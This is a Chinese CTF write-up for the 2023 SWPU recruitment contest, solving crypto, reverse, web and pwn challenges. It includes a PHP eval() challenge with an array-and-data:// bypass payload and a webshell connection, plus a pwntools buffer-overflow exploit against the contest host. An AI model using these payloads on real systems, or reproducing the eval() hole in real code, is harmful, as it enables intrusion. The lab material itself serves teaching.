2023SWPU

记录2023SWPU招新赛————Crypto——Wp

Crypto

Ceaser_base

# Substituted Base64 alphabet: the upper- and lower-case runs start at H/h
# instead of A/a. The table is an encoding, not a key - it is printed in the
# challenge itself, so anyone holding it can decode.
s = (
    "HIJKLMNOPQRSTUVWXYZABCDEFG"
    "hijklmnopqrstuvwxyzabcdefg"
    "0123456789+/"
)

def My_base64_encode(inputs):
    """Print the Base64-style encoding of *inputs* using the module-level table ``s``.

    Each character is turned into its binary digits, left-padded to eight
    bits; three such groups are cut into four 6-bit indexes into ``s``.
    A short final group is zero-padded and marked with ``=`` characters.
    Code points above 255 yield more than eight digits and are not handled
    specially. Nothing is returned; the result is printed.
    """
    octets = [format(ord(ch), "0>8b") for ch in inputs]
    encoded = []
    pad = 0
    for start in range(0, len(octets), 3):
        group = octets[start:start + 3]
        # Only the last group can be short; pad tells how many bytes are missing.
        pad = 3 - len(group)
        group.extend(["0" * 8] * pad)
        bits = "".join(group)
        sextets = [int(bits[k:k + 6], 2) for k in range(0, 24, 6)]
        # Drop the sextets that consist purely of padding bits.
        encoded.extend(s[value] for value in sextets[:4 - pad])
    outputs = "".join(encoded) + "=" * pad
    print("Encrypted String:\n%s " % outputs)

# Interactive driver: the encoder only runs after the literal answer "ys".
print("-------input 'ys' to encode-------")

sr = input("Please input!\n")
if sr == "ys":
    My_base64_encode(input("Please enter a string that needs to be encrypted: \n"))

cipher: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

给了码表HIJKLMNOPQRSTUVWXYZABCDEFGhijklmnopqrstuvwxyzabcdefg0123456789+/

用上面给出的码表做换表base64解码就行

flag:NSSCTF{Gen5h1n_5t@rt5!}

EasyRSA

import libnum  

# Textbook RSA key generation from two independent 1024-bit primes.
p, q = (libnum.generate_prime(1024) for _ in range(2))
e = 65537
n = p * q
phi_n = (p - 1) * (q - 1)
d = libnum.invmod(e, phi_n)

# The flag is converted to an integer and encrypted without any padding.
m = libnum.s2n("NSSCTF{*******************}")
c = pow(m, e, n)

# Printing p and q publishes the factorisation of n, i.e. the private key:
# whoever sees this output can recompute d.
for label, value in (("p=", p), ("q=", q), ("e=", e), ("c=", c)):
    print(label, value)

#p= 122912801126049869009003839542545176400185213365268209105714006257803073428638629824801261702125287814910668428403367391355051987389837804474055637991864563803834741161217607848968821280710324766558457056004037592628178078680121173634128054936108782807954132605887275556228703383455969903056759874047110115433
#q= 120790113700754477830062212762518406876786376726996249661848284428829412089402183812692045970711341815805796005449714738748110749559462448861357011272792817313060401380148108517705435100103533857957024851181447994572972501120774586405811257420853542417275740953525627232008812587423053626515513859653865873671
#e= 65537
#c= 7094224488947659163318199615533819770556597977720767621640224798887506152292861133457571683713587909779712343346370719403811813233693263526316785431883833118583425528830238629831001255198236686372518770451273159769779374149881346761523688131115323441973953523582174059584087249568245044443295176738493785560215046375056269378223045128094953923926250055718405799885041115025529297362914403732661935017257507786348635366480744933193471899621592092711962814949533564454932121056035003021428158830645604347966849572981124877683317022116903132719663958775850982016292384237647664448371811915879714093710876989697939277005

p、q都直接给出了,算出d后解密即可

exp:

from Crypto.Util.number import *
import gmpy2


# Values copied from the challenge output: p and q are the two primes whose
# product is the modulus, e is the public exponent, c is the ciphertext.
p= 122912801126049869009003839542545176400185213365268209105714006257803073428638629824801261702125287814910668428403367391355051987389837804474055637991864563803834741161217607848968821280710324766558457056004037592628178078680121173634128054936108782807954132605887275556228703383455969903056759874047110115433
q= 120790113700754477830062212762518406876786376726996249661848284428829412089402183812692045970711341815805796005449714738748110749559462448861357011272792817313060401380148108517705435100103533857957024851181447994572972501120774586405811257420853542417275740953525627232008812587423053626515513859653865873671
e= 65537
c= 7094224488947659163318199615533819770556597977720767621640224798887506152292861133457571683713587909779712343346370719403811813233693263526316785431883833118583425528830238629831001255198236686372518770451273159769779374149881346761523688131115323441973953523582174059584087249568245044443295176738493785560215046375056269378223045128094953923926250055718405799885041115025529297362914403732661935017257507786348635366480744933193471899621592092711962814949533564454932121056035003021428158830645604347966849572981124877683317022116903132719663958775850982016292384237647664448371811915879714093710876989697939277005

# With both primes known, the private exponent follows directly from phi(n).
n = p * q
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
#NSSCTF{RSA_1s_so_ea3y_and_interest1ng!}

dpdp

from Crypto.Util.number import *
from libnum import *

# Flag with a fixed run of ASCII '0'/'1' characters appended.
flag = b'NSSCTF{******}' + b'1010101010101010101010101010101010101010100010101010101010101010101101'

p, q = getPrime(512), getPrime(512)
n = p * q
e = 65537
d = inverse(e, (p - 1) * (q - 1))
# dp is the CRT half of the private exponent. It is printed below together
# with n and c, although it needs the same protection as d itself.
dp = d % (p - 1)
m = s2n(flag)
c = pow(m, e, n)

for label, value in (("n", n), ("c", c), ("dp", dp)):
    print(f'{label} = {value}')

'''
n = 62950660589752377241535942010457460675378335694404721223426371627802159493655570041534480026979837056215567303530448462076388942749116962945931432723672826148999814815864738069663127706046027850586024555861960247057288826014343547293035737544457656904257388300461848219257240252715837662741274235378360898441
c = 26392919777656338278184497106215581599692023606797351841011065350738534402079717897589592521000832026751736045905247050532819571969784687491977953157313304550096179520376626220816081159472339787295872214912587497324709488986746768994907107727184468228540635002062232484115731701648311946527233449512543132274
dp = 7088497034630351463006975624795947102639056977565074157092915907376477955247769847204254053775159112398217033648894620506901638351932922911273150932128973
'''

dp泄露模板题

exp:

from Crypto.Util.number import long_to_bytes
import gmpy2

# Public modulus, ciphertext and leaked CRT exponent printed by the challenge;
# e is the fixed public exponent from the generator script.
n = 62950660589752377241535942010457460675378335694404721223426371627802159493655570041534480026979837056215567303530448462076388942749116962945931432723672826148999814815864738069663127706046027850586024555861960247057288826014343547293035737544457656904257388300461848219257240252715837662741274235378360898441
c = 26392919777656338278184497106215581599692023606797351841011065350738534402079717897589592521000832026751736045905247050532819571969784687491977953157313304550096179520376626220816081159472339787295872214912587497324709488986746768994907107727184468228540635002062232484115731701648311946527233449512543132274
dp = 7088497034630351463006975624795947102639056977565074157092915907376477955247769847204254053775159112398217033648894620506901638351932922911273150932128973
e = 65537

def dp_leak(dp, c, n, e):
    """Print the plaintext of *c* once a factor of *n* is derived from *dp*.

    dp = d mod (p-1) means e*dp - 1 is a multiple of p-1. Every divisor k in
    [1, e) of e*dp - 1 gives a candidate (e*dp - 1)//k + 1; a candidate that
    divides n is accepted as a prime factor. The loop does not stop after a
    hit, so every matching k prints a result. Nothing is returned.

    The search space is bounded by e, which is why leaking dp next to a small
    public exponent is equivalent to leaking the private key.
    """
    target = dp * e - 1
    for k in range(1, e):
        if target % k:
            continue
        candidate = target // k + 1
        if n % candidate:
            continue
        cofactor = n // candidate
        d = gmpy2.invert(e, (candidate - 1) * (cofactor - 1))
        print(long_to_bytes(pow(c, d, n)))

# Run the recovery on the published values; the plaintext is printed by dp_leak.
dp_leak(dp, c, n, e)
#NSSCTF{CTFCTFNSSNSS}

polynomial

from Crypto.Util.number import *
flag = b'NSSCTF{******}'
m = bytes_to_long(flag)

# Five 512-bit coefficients (all printed) and one 64-bit evaluation point x
# (the only value that is not printed).
a, b, c, d, e = (getPrime(512) for _ in range(5))
x = getPrime(64)

p = getPrime(1024)

# Horner form of a*x**4 + b*x**3 + c*x**2 + d*x + e, reduced modulo p.
y = ((((a * x + b) * x + c) * x + d) * x + e) % p

for label, value in (("p", p), ("a", a), ("b", b), ("c", c), ("d", d), ("e", e), ("y", y)):
    print(f'{label} = {value}')
# h hides the flag only behind the 64-bit factor x.
print(f'h = {x*m}')

'''
p = 158805288384650271811274620112885426807134870587281058486409657841571541118874370262125616758392586636436387032461169543181918821693975663497124408432536495676514953509756505781488235396628730376794651046582155886825258656047349260441547239700695773934518441411466809921946609164932234396841476405798428700843
a = 6782997653971692606019358747667066963688636909392719204001155907616272998599567932030340899158310591583056298423803386927289244122405887173827359025095219
b = 7373784501270128110088353737302182289453185058537147667058852830178883492374394182313086562761123093282613985656842374554466162992585768060168515936322837
c = 12604317328077074383094898759023155531982085126299017370476099122695860476733267706510100804874716354025394150676456477445303955715981977583036765619931291
d = 8651550199315105291497863570314512750737000678752642987669418859342691686702373116147125246177399639155277789016646392989483699799276013474039473014389069
e = 6819653219987864110332165353640553980353581969662542365282269257622467162685937603557862048653003559950780009596692439320585574228684924030626160305559221
y = 187626421635118933741196210961559541641107643327742932086152135660947241144749750951157691964883138108211067837818748515766812840026814947057023367814232867155997328882540000727585104081833734697954005690818776434169815240704563337
h = 36198427687223295973782557044383345640934859884880641150183916728479006412929786917944908958646498915497129126843345300628359
'''

先看 y = a*x**4 + b*x**3 + c*x**2 + d*x + e:这是模p意义下的等式,在模p下解这个方程得到x

然后根据h = x * m,除回来就行

exp:

#sage
import gmpy2
# Values printed by the challenge script: modulus p, the five polynomial
# coefficients a..e, the evaluation result y and the product h = x*m.
p = 158805288384650271811274620112885426807134870587281058486409657841571541118874370262125616758392586636436387032461169543181918821693975663497124408432536495676514953509756505781488235396628730376794651046582155886825258656047349260441547239700695773934518441411466809921946609164932234396841476405798428700843
a = 6782997653971692606019358747667066963688636909392719204001155907616272998599567932030340899158310591583056298423803386927289244122405887173827359025095219
b = 7373784501270128110088353737302182289453185058537147667058852830178883492374394182313086562761123093282613985656842374554466162992585768060168515936322837
c = 12604317328077074383094898759023155531982085126299017370476099122695860476733267706510100804874716354025394150676456477445303955715981977583036765619931291
d = 8651550199315105291497863570314512750737000678752642987669418859342691686702373116147125246177399639155277789016646392989483699799276013474039473014389069
e = 6819653219987864110332165353640553980353581969662542365282269257622467162685937603557862048653003559950780009596692439320585574228684924030626160305559221
y = 187626421635118933741196210961559541641107643327742932086152135660947241144749750951157691964883138108211067837818748515766812840026814947057023367814232867155997328882540000727585104081833734697954005690818776434169815240704563337
h = 36198427687223295973782557044383345640934859884880641150183916728479006412929786917944908958646498915497129126843345300628359

# The relation from the challenge holds modulo p, so the polynomial is built
# over Zmod(p) with the published y moved to the left-hand side.
R.<x> = PolynomialRing(Zmod(p))
f = a*x^4 + b*x^3 + c*x^2 + d*x + e - y

# The challenge draws x as a 64-bit prime, hence the 2^64 bound on the root.
# Note that x is rebound here from the ring generator to the list of roots.
x = f.monic().small_roots(X=2^64,beta=0.4)
print(x)

# Root value pasted in by hand (presumably the one printed above - confirm).
x = 12896387745855437651
# h was produced as the integer product x*m, so integer division recovers m.
m = h // x
print(bytes.fromhex(hex(m)[2:]))
# NSSCTF{05223898-4a23-11ee-ae75-c03c59457d4d}

Classical Cipher

一只兔子翻过5层栅栏去找base玩

U2FsdGVkX19aQNEomnRqmmLlI9qJkzr0pFMeMBF99ZDKTF3CojpkTzHxLcu/ZNCYeeAV3/NEoHhpP5QUCK5Ac+HJlZBMGdKDYwko5+sAATQ=

Rabbit解密得到TGhmYlMlXXNwX2BTb3NoQWcye1VweSRfcXEGdmBheDx0I1BkMXdfXG0ldzd=bGBy

栅栏密码5层加密得到TlNTQ1RGe1dlbGMwbWVfdDBfdGhlX3cwcmxkXzBmX2NyeXB0MGdyYXBoeSEhIX0=

base64解密NSSCTF{Welc0me_t0_the_w0rld_0f_crypt0graphy!!!}

肮脏的base64

用ARCHPR爆破得到压缩包密码是:CTF

得到以下信息

今天组织拦截到的密文是HsVHOpJ0lpW9yK4akKWDWe4UW4ZKI0sMkwN3N2WZ,但是组织发现这个似乎并不是传统是base,经情报人员分析得到了原始加密的码表
o57gjn0Sb9ETqVLYOJyHX42kNaIhrWlU****eszCfD+dtPm1u3AMKpwRGvcxQZ8B
但码表在传递过程中被人为污染了一块,聪明的你能为组织解出今天的密文吗?

换表base64,写个脚本爆破码表

exp:

import base64
import itertools

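cipher = "HsVHOpJ0lpW9yK4akKWDWe4UW4ZKI0sMkwN3N2WZ"

# Standard Base64 alphabet.
table1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Custom alphabet from the challenge with the four damaged positions removed.
table2 = "o57gjn0Sb9ETqVLYOJyHX42kNaIhrWlUeszCfD+dtPm1u3AMKpwRGvcxQZ8B"
# The damaged block follows the first 32 symbols of the custom alphabet.
GAP_AT = 32

# Symbols of the standard alphabet that the damaged table lacks. The name
# `missing` replaces the original `list`, which shadowed the builtin.
missing = [ch for ch in table1 if ch not in table2]
print(missing)

# Try every ordering of the missing symbols in the gap. None of them occurs in
# the ciphertext, so each ordering decodes to the same bytes; the search stops
# at the first hit instead of printing the result once per ordering (the
# original `break` only left the innermost of four nested loops).
# A substituted alphabet is an encoding, not encryption: a partly known table
# is enough to read the message.
flag = None
for pad in itertools.permutations(missing):
    candidate = table2[:GAP_AT] + "".join(pad) + table2[GAP_AT:]
    decoded = base64.b64decode(cipher.translate(str.maketrans(candidate, table1)))
    if b"NSSCTF" in decoded:
        flag = decoded
        print(flag)
        break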
#NSSCTF{WIKEY_GivE_u_this_f1ag}

close

from libnum import *
from gmpy2 import *

# q is the very next prime after p, so both factors lie right next to
# sqrt(n) - the gap between them is tiny compared with their size.
p = generate_prime(1024)
q = next_prime(p)
e = 65537
n = p * q
phi = (p - 1) * (q - 1)
d = invmod(e, phi)

# Flag converted to an integer and encrypted without padding.
m = s2n('NSSCTF{*******}')
c = pow(m, e, n)

for label, value in (("n=", n), ("e=", e), ("c=", c)):
    print(label, value)

# n= 24981376790941538042242194741227892897407513396986731688877133454927442860995432316502739082570143505514748189761926835267759902439088795405888334103808204493954060044146586606969762154041793765844462081845490598211667272961234605967919438875499785814549051002289336390400088945736443426364361032870741024016549739096474413537901098157940458928277363388694717514323106251487767419607466664175936942972759711506228656400164583540573319572125036265662330306877811831045019686459493451558882811173136631573392182233161484350878695026357462290962322316959710815852914274474767115283825849610223430527125542218326259388501
# e= 65537
# c= 20159395346151098135636315342962498279920000537186367678734614295342297238729946157173169398141183795295342421626812913110784320710149318393656661582157610182569479131625808166266400522513050071081253869746865806961410702124426021839786686971490883603141916263075756918270160269956469968815381434371042453456185750940323619568741956243054983302281739844073931738335165924679149156513059772597287311150001080524533236565521881558592378167621577532597521749930820990533120461791013359786254216859344006298715497621642857727174896969485816794718062289736382736417151820935214824518306312811267158057425922650562544599188

$p,q$很接近

exp:

from Crypto.Util.number import *
import gmpy2

# n and c were left blank by the author; fill in the values printed by the
# challenge script above before running.
n=
e= 65537
c=

# The two primes are adjacent, so floor(sqrt(n)) lies between them and the
# next prime above the root is taken as a factor of n.
root, _exact = gmpy2.iroot(n, 2)
p = gmpy2.next_prime(root)
q = n // p
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
#NSSCTF{1d518f8b-5878-11ee-acac-c03c59457d4d}

小明文?

from Crypto.Util.number import *
import random
# Both names refer to the same placeholder flag bytes.
flag = b'NSSCTF{*******}'
m1 = flag

def encrypt1(m1):
    """Encrypt *m1* and an affine image of it under one RSA key, then print all values.

    A fresh 1400-bit modulus n is built from two 700-bit primes; the public
    exponent is 5. The message integer and a*m + b (a, b random 128-bit
    primes) are both raised to e modulo n. n, a, b and both ciphertexts are
    printed, so the affine relation between the two plaintexts is public.
    Nothing is returned.

    Two unpadded ciphertexts of related messages under the same small
    exponent are exactly the setting randomised padding is meant to prevent.
    """
    p = getPrime(700)
    q = getPrime(700)
    n = p * q
    e = 5

    a = getPrime(128)
    b = getPrime(128)
    plain = bytes_to_long(m1)
    related = a * plain + b

    c1 = pow(plain, e, n)
    c2 = pow(related, e, n)

    for label, value in (("n", n), ("a", a), ("b", b), ("c1", c1), ("c2", c2)):
        print(f'{label} = {value}')

# n = 13026126941826887019162872735099540876106694302074884925200107036130428843197729140372377590706535217469477301361486550282890330093772372813532795303163348233096919179478061917423707929667355386062657434467799360617526194768968700908096844475960205671302377364202483195391706116078632202015938962280529309403244885363904094804118278167720593581764017089021116316636464533785051436622916960956665030100255641288863474938703
# a = 280807370135687531454416708417179457159
# b = 210598260561987226227971066630761929397
# c1 = 5484670538103757119990644460454986219076673914082966464351809153114702100411054106785392646801736865489738145857425179185164710603704198643749378051371008266521829572436350080663825339915763509501690398283916091505443322384568973565599179112299853287766734493187659418383619877040013434926843623979979122417950089001830664273269598688130410251828579862218274297572192961909808728768317567218412746711665911495028223620671
# c2 = 249587944874112168607313602465869274336587750392364868939732783502223999305089384749508572630699199927194600499968110646290832205640569694933539973256281796631433129626712361622584048439446364992886884217198680921278383770604919381329363647924261642857483728973331091285820401689502291336332199019252649615680893389557508558362194551939434128389351824194393680744241807605416750291337127085044177563509645273228457253193

相关消息攻击

exp:

import gmpy2
from Crypto.Util.number import *


def franklinReiter(n,e,c1,c2):
    """Return the common root of x^e - c1 and (a*x + b)^e - c2 over Zmod(n).

    The coefficients ``a`` and ``b`` are not parameters; they are read from
    module scope and must be set before the call. Both polynomials vanish at
    the plaintext, so their monic gcd is expected to be linear (x - m); the
    negated constant term of that gcd is returned.
    """
    PR.<x> = PolynomialRing(Zmod(n))
    f1 = x^e - c1
    f2 = (a*x + b)^e - c2

    def monic_gcd(u, v):
        # Euclid's algorithm on polynomials, normalised to leading coefficient 1.
        while v:
            u, v = v, u % v
        return u.monic()

    common = monic_gcd(f1, f2)
    return -common[0]

# n, a, b, c1 and c2 were left blank by the author; fill in the values printed
# by the challenge script above. a and b are read as globals by franklinReiter.
n =
a =
b =
e = 5
c1 =
c2 =

# The result is an element of Zmod(n); convert it to a plain integer before
# turning it back into bytes.
m = franklinReiter(n, e, c1, c2)
recovered = int(m)
print(long_to_bytes(recovered))
#NSSCTF{89c507f3-4a21-11ee-a71e-c03c59457d4d}

dpdpdpdp

from Crypto.Util.number import *
flag = b'NSSCTF{******}'

p = getPrime(512)
q = getPrime(512)
n = p * q
# 128-bit random public exponent: too large to enumerate multiples of p-1,
# but that alone does not make a leaked dp harmless.
e = getPrime(128)
d = inverse(e, (p - 1) * (q - 1))
dp = d % (p - 1)

m = bytes_to_long(flag)
c = pow(m, e, n)

for label, value in (("n", n), ("e", e), ("c", c), ("dp", dp)):
    print(f'{label} = {value}')

'''
n = 92288362151232755164303382554034496430634785857894506752180261103500715219090974532177552845107426542175470207920267802066773828210866572070045093611090322738109527534622730588618668861998969946471756352024368486322527057077613762697792913167023012077178671066981439295386486943067698150993422039585259179729
e = 229991316986730339421575788374847647237
c = 66178170892880340054212366602556925884485962775832591797127163461420023986798822926684824340567060840259672460835004142425374706821346941926520921852009455818529825976414766339170445233789109526300838535719649346266975388774091834431039678689254534566870194580604694419819400454951059125553501095973278807456
dp = 8987556601717285362487353965045062789633142861774364363374961991445049127918653163458814169532860957264061203394944931114888144611267605606197232438332289
'''

dp泄露加e很大

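因为 $e \cdot dp \equiv 1 \pmod{p-1}$,即 $dp \times e = k(p-1) + 1$,任取一个不被 $p$ 整除的 $a$,由费马小定理有 $a^{dp\times e} \equiv a^{k(p-1) + 1} \equiv a \pmod p$

$\therefore a^{dp \times e} - a = k'p$($k'$ 为某个整数,与上面的 $k$ 无关)

$p$ 整除 $n$,所以两边同时模 $n$ 后仍是 $p$ 的倍数:$a^{dp \times e} - a \equiv k'p \pmod n$

这样对 $(a^{dp \times e} - a) \bmod n$ 和 $n$ 求最大公因数即可求得 $p$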

exp:

from Crypto.Util.number import getPrime,long_to_bytes
import gmpy2

# All four values were left blank by the author; fill in n, e, c and dp from
# the challenge output above before running.
n =
e =
c =
dp =

# Small random base for the Fermat argument.
a = getPrime(10)

# e*dp = 1 (mod p-1), so a**(e*dp) - a is a multiple of p; reducing it
# modulo n keeps that property, and the gcd with n yields p.
residue = pow(a, dp * e, n) - a
p = gmpy2.gcd(residue, n)

q = n // p
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
# NSSCTF{D0_YoU_WAN1_TO_J0In_NsSCTf}

Reverse

base64

ida打开,shift + F12,拿到base64的密文:TlNTQ1RGe0lfcjNhbGx5X3cwdTFkX3U1ZV9iYXNlNjRfdDBfM25jb2RlX2ZsYWd9

解base64得到NSSCTF{I_r3ally_w0u1d_u5e_base64_t0_3ncode_flag}

UPX

先脱壳,再放ida,直接拿到flag:NSSCTF{UPX_c4n_3as1ly_5h3ll_pr0gr4m!}

test your cmd

打开终端

运行文件名.exe > 文件名.txt,成功保存运行结果:NSSCTF{l0Oks_l1ke_your_cmd_1s_w0rkin9_v3ry_well}

蟒蛇中文破解绿色版

from base_class import 分数  # 好好好我终于可以在python里计算分数了!

# 分数 = "fraction", 分子 = "numerator", 分母 = "denominator".
# Two fixed multipliers: one half and one third.
a = 分数(分子=1, 分母=2)
b = 分数(1, 3)  # same constructor, positional arguments

列表 = []  # 列表 = "list"; this empty value is overwritten below

# Each flag character becomes the fraction ord(ch)/1, multiplied by a (1/2) at
# even positions and by b (1/3) at odd positions; the product is stored in its
# string form.
列表 = [
    str(分数(ord(ch), 1) * (b if idx % 2 else a))
    for idx, ch in enumerate(__import__("secret").flag)
]

print(列表)

# 列表 = ['39/1', '83/3', '83/2', '67/3', '42/1', '70/3', '123/2', '116/3', '52/1', '49/3', '115/2', '95/3', '49/2', '115/3', '95/2', '112/3', '121/2', '95/3', '119/2', '37/1', '57/1', '36/1', '50/1', '11/1', '95/2', '35/1', '58/1', '35/1', '115/2', '39/1', '26/1', '34/1', '97/2', '36/1', '33/2', '125/3']

理解一下就行

exp:

c = ['39/1', '83/3', '83/2', '67/3', '42/1', '70/3', '123/2', '116/3', '52/1', '49/3', '115/2', '95/3', '49/2', '115/3', '95/2', '112/3', '121/2', '95/3', '119/2', '37/1', '57/1', '36/1', '50/1', '11/1', '95/2', '35/1', '58/1', '35/1', '115/2', '39/1', '26/1', '34/1', '97/2', '36/1', '33/2', '125/3']

# Split every "numerator/denominator" string into its two parts.
a = [item.split('/')[0] for item in c]
b = [item.split('/')[1] for item in c]

pieces = []
for idx, (num, den) in enumerate(zip(a, b)):
    value = int(num)
    # Denominator 2 or 3: the fraction did not reduce, the numerator is the character code.
    if den in ("2", "3"):
        pieces.append(chr(value))
    # Denominator 1: the fraction reduced, so multiply back by 2 (even index) or 3 (odd index).
    if den == "1":
        pieces.append(chr(value * (2 if idx % 2 == 0 else 3)))

flag = "".join(pieces)
print(flag)
#NSSCTF{th1s_1s_py_world!_itisu4fal!}

字节码

3           0 LOAD_CONST               1 ('***************************')
2 STORE_FAST 0 (flag)

4 4 BUILD_LIST 0
6 STORE_FAST 1 (s)

5 8 BUILD_LIST 0
10 LOAD_CONST 2 ((177, 171, 170, 185, 167, 180, 126, 136, 126, 147, 150, 146, 122, 126, 142, 129, 139, 137, 142, 117, 122, 130, 195, 132, 116, 109, 104))
12 LIST_EXTEND 1
14 STORE_FAST 2 (tmp)

6 16 LOAD_GLOBAL 0 (range)
18 LOAD_GLOBAL 1 (len)
20 LOAD_FAST 0 (flag)
22 CALL_FUNCTION 1
24 CALL_FUNCTION 1
26 GET_ITER
>> 28 FOR_ITER 30 (to 60)
30 STORE_FAST 3 (i)

7 32 LOAD_FAST 1 (s)
34 LOAD_METHOD 2 (append)
36 LOAD_CONST 3 (255)
38 LOAD_GLOBAL 3 (ord)
40 LOAD_FAST 0 (flag)
42 LOAD_FAST 3 (i)
44 BINARY_SUBSCR
46 CALL_FUNCTION 1
48 LOAD_FAST 3 (i)
50 BINARY_ADD
52 BINARY_XOR
54 CALL_METHOD 1
56 POP_TOP
58 JUMP_ABSOLUTE 28

8 >> 60 LOAD_FAST 2 (tmp)
62 LOAD_FAST 1 (s)
64 COMPARE_OP 2 (==)
66 POP_JUMP_IF_FALSE 78

9 68 LOAD_GLOBAL 4 (print)
70 LOAD_CONST 4 ('you are right')
72 CALL_FUNCTION 1
74 POP_TOP
76 JUMP_FORWARD 8 (to 86)

11 >> 78 LOAD_GLOBAL 4 (print)
80 LOAD_CONST 5 ('this is wrang')
82 CALL_FUNCTION 1
84 POP_TOP
>> 86 LOAD_CONST 0 (None)
88 RETURN_VALUE

上面代码等于

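# Source-level reconstruction of the disassembly above.
flag = '***************************'
s = []
tmp = [177, 171, 170, 185, 167, 180, 126, 136, 126, 147, 150, 146, 122, 126, 142, 129, 139, 137, 142, 117, 122, 130, 195, 132, 116, 109, 104]

for i in range(len(flag)):
    # The bytecode runs BINARY_ADD before BINARY_XOR; the parentheses spell
    # out that order (+ already binds tighter than ^ in Python).
    s.append(255 ^ (ord(flag[i]) + i))

if tmp == s:
    print('you are right')
else:
    # Literal restored to the constant shown in the disassembly (LOAD_CONST 5).
    print('this is wrang')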

逆回来即可

exp:

tmp = [177, 171, 170, 185, 167, 180, 126, 136, 126, 147, 150, 146, 122, 126, 142, 129, 139, 137, 142, 117, 122, 130, 195, 132, 116, 109, 104]

# Invert the check from the disassembly: XOR with 255 first, then subtract
# the position index to get the character code.
flag = "".join(chr((value ^ 255) - idx) for idx, value in enumerate(tmp))

print(flag)
#NSSCTF{pyc_bytcode_wqh&dsy}

Web

colorful_snake

F12,调试器里面找到game.js文件

然后找到this_is_real_flag

\u004e\u0053\u0053\u0043\u0054\u0046\u007b\u0039\u0066\u0038\u0037\u0038\u0065\u0063\u0033\u002d\u0033\u0062\u0037\u0035\u002d\u0034\u0062\u0030\u0066\u002d\u0061\u0034\u0063\u0034\u002d\u0032\u0061\u0034\u0061\u0031\u0031\u0036\u0063\u0032\u0030\u0064\u0031\u007d

密文解Unicode得到NSSCTF{9f878ec3-3b75-4b0f-a4c4-2a4a116c20d1}

一键连接!

 <?php
// CTF challenge source: three request-controlled checks gate an eval() of POST data.
// The script prints its own source and silences all error output.
highlight_file(__FILE__);
error_reporting(0);
// All five values are taken straight from the query string; nothing below
// checks that they are strings before they are hashed or used as a path.
$md5_1 = $_GET['md5_1'];
$md5_2 = $_GET['md5_2'];
$sha1_1 = $_GET['sha1_1'];
$sha1_2 = $_GET['sha1_2'];
$new_player =$_GET['new_player'];
// Inputs must differ (strict !==) while their md5() results are identical (===).
// NOTE(review): per the write-up below, array input makes both hash calls
// return the same non-hash value; an is_string() check before hashing closes this.
if ($md5_1 !== $md5_2 && md5($md5_1) === md5($md5_2)) {
// Same pattern for sha1(); note the inequality here is the loose != operator.
if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2)) {
// A request-supplied string is passed as the path/URL argument, so the caller
// chooses the stream wrapper; fixed paths or an allow-list avoid that.
if (file_get_contents($new_player) === "Welcome to NSSCTF!!!") {
echo "Congratulations~~~~~~~~~";
echo "试试need Antsword<br/>";
// Runs the POST parameter as PHP code with errors suppressed - deliberate in
// this challenge; request data must never reach eval() in real code.
@eval($_POST['Nss']);
}else{
echo "可曾听过data协议?";
}
} else {
echo "sha1又如何相等呢";
}
} else {
echo "如何让md5值相等呢¿";
}
如何让md5值相等呢¿

md5强比较和sha1强比较,可用数组进行绕过,因为md5等函数不能处理数组,导致函数返回Null。而Null是等于Null的,导致了绕过

PHP特性 | 雲流のLowest World (c1oudfl0w0.github.io)

if (file_get_contents($new_player) === "Welcome to NSSCTF!!!")

利用data协议:文件包含漏洞之PHP伪协议中的data://的那些事~_data://text-CSDN博客

payload:

md5_1[]=1&md5_2[]=2&sha1_1[]=1&sha1_2[]=2&new_player=data:text/plain,Welcome to NSSCTF!!!

然后蚁剑连接

NSSCTF{44cdf084-8982-4a03-8a09-b7aff6c2a059}

pwn

guess

猜数字就行

Sign

gdb 文件名

disass backdoor (函数名)找到地址0x0401236

ROPgadget --binary 文件名 --only "rop/ret"找返回地址

构造exp:

from pwn import *

# Challenge instance named in the write-up.
p = remote("node4.anna.nssctf.cn", 28601)

# Fixed addresses taken from the steps above (disassembly and gadget search).
# NOTE(review): hard-coded addresses and a plain overwrite suggest the binary
# has neither PIE nor a stack canary - confirm with a hardening check.
backdoor_addr = 0x401236
pop_ret = 0x000000000040101a
offset = 0x30 + 0x8  # presumably buffer size plus the saved frame pointer - confirm

payload = b"".join((b'a' * offset, p64(pop_ret), p64(backdoor_addr)))
p.sendline(payload)
p.interactive()

# NSSCTF{88846cec-f874-4eff-b999-d5cfbe961639}